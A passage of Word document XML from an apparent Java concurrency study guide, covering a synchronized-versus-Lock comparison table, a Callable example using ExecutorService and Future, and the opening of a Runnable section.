          </w:tcPr>
          <w:p w14:paraId="614696E2"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Yes, via tryLock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="279094E7" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="512CB3D8"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Reentrancy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFC3F4F"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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A158B5E"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Yes, via ReentrantLock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="3D3CB72A" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70AD3037"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Deadlock Prevention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1FA711"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Not directly manageable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C58FF08"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Can be handled using tryLock()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="5928EC29" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D4B9741"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Read-Write Lock Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37F68004"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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0699E669"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Yes, via ReentrantReadWriteLock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00414276" w:rsidRPr="00414276" w14:paraId="4BD25188" w14:textId="77777777" w:rsidTr="00F3137C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F8CC92"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Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10CCB131"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Simple, built into the language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17B66877" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00414276">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>More flexible, requires explicit handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E8EA000" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00000000" w:rsidP="004142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E0ADD40">
          <v:rect id="_x0000_i1872" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D18C9" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CCA95E" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>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Use synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need a simple, easy-to-implement synchronization mechanism for basic mutual exclusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A4686" w14:textId="77777777" w:rsidR="00F3137C" w:rsidRPr="00414276" w:rsidRDefault="00F3137C" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need more advanced features like timeouts, interruptibility, or complex scenarios where fine-grained control over synchronization is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC5E7F" w14:textId="1E7E81DB" w:rsidR="008666ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="008666E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2F5E5D2">
          <v:rect id="_x0000_i1873" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE75FA7" w14:textId="77777777" w:rsidR="004076D9" w:rsidRPr="00CE4B95" w:rsidRDefault="004076D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="297" w:name="_Toc196307777"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Callable interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p w14:paraId="1F5962BC" w14:textId="77777777" w:rsidR="008E1011" w:rsidRPr="00414276" w:rsidRDefault="00C0192E" w:rsidP="00414276">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F2B93" w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>is a functional interface used to execute concurrent tasks that return a result and can throw exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5510E9" w14:textId="77777777" w:rsidR="008E1011" w:rsidRPr="00CE4B95" w:rsidRDefault="008E1011">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>It's most commonly used with ExecutorService and Future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E8DEB0" w14:textId="67921C50" w:rsidR="00C0392A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C0392A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and is similar to the Runnable interface but with some key differences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B3DC41" w14:textId="77777777" w:rsidR="00C0392A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C0392A" w:rsidP="00CA5DB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Features of Callable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED7339B" w14:textId="77777777" w:rsidR="008E1011" w:rsidRPr="00CE4B95" w:rsidRDefault="00C0392A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Returns a result</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Unlike Runnable, which returns void, Callable returns a result of a specified type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A802EE" w14:textId="77777777" w:rsidR="008E1011" w:rsidRPr="00CE4B95" w:rsidRDefault="00C0392A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Can throw checked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Callable.call() method can throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8658F5" w14:textId="5F9DC554" w:rsidR="00C0392A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C0392A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used with ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> — It is typically used with ExecutorService to submit tasks asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7105DD" w14:textId="3EC728D3" w:rsidR="00F15A90" w:rsidRPr="00CE4B95" w:rsidRDefault="00F15A90" w:rsidP="006F2B93">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9EF63" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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ncurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C1691B" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E9F6DD" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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allableExamp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8B0761F" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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row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xcepti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4B04413" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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xecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executo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xecuto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ewSingleThreadExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59306B50" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191B0CF" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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allable</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task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D38B962" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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leep</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000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442CC9AE" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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Task completed!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0541F354" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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E208C32" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AF3A39" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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uture</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futur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xecut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ubmi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ask</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59714D" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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Resul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uture</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Blocks until result is ready</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C7395" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB0873" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        execut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hutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FFE25" w14:textId="77777777" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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86F392A" w14:textId="0EF56DB0" w:rsidR="00F15A90" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52016DC7" w14:textId="382E9567" w:rsidR="0089148E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="1C34FF30">
          <v:rect id="_x0000_i1874" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD577E" w14:textId="77777777" w:rsidR="0089148E" w:rsidRPr="00CE4B95" w:rsidRDefault="0089148E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="_Toc196307778"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is Runnable interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
    </w:p>
    <w:p w14:paraId="15723B57" w14:textId="6114EA21" w:rsidR="0089148E" w:rsidRPr="00CE4B95" w:rsidRDefault="0089148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F41CF6E" w14:textId="77777777" w:rsidR="002F141B" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
